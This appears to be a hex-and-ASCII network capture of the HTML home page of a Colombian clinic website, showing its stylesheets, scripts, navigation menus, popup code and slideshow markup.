                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1991INData Raw: 37 63 61 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7cad<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1992INData Raw: 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70
                                                                                                                                                                                                                                                                        Data Ascii: s/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/temp
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1993INData Raw: 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74
                                                                                                                                                                                                                                                                        Data Ascii: js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootst
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1994INData Raw: 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61
                                                                                                                                                                                                                                                                        Data Ascii: ngines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="ga
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1996INData Raw: 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c
                                                                                                                                                                                                                                                                        Data Ascii: size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1997INData Raw: 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20
                                                                                                                                                                                                                                                                        Data Ascii: tem g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1998INData Raw: 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d
                                                                                                                                                                                                                                                                        Data Ascii: i></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2000INData Raw: 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                        Data Ascii: "g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-ite
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2001INData Raw: 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64
                                                                                                                                                                                                                                                                        Data Ascii: nu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2002INData Raw: 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c
                                                                                                                                                                                                                                                                        Data Ascii: iner" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></l
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2004INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20
                                                                                                                                                                                                                                                                        Data Ascii: g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2005INData Raw: 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d
                                                                                                                                                                                                                                                                        Data Ascii: lass="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-m
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2006INData Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65
                                                                                                                                                                                                                                                                        Data Ascii: ass="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-compone
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2008INData Raw: 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67
                                                                                                                                                                                                                                                                        Data Ascii: <style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup backg
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2009INData Raw: 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e
                                                                                                                                                                                                                                                                        Data Ascii: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafan
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2010INData Raw: 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e
                                                                                                                                                                                                                                                                        Data Ascii: Id(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2012INData Raw: 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75
                                                                                                                                                                                                                                                                        Data Ascii: k "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-bu
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2013INData Raw: 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f
                                                                                                                                                                                                                                                                        Data Ascii: ome/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblo
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2014INData Raw: 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: cialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure cl
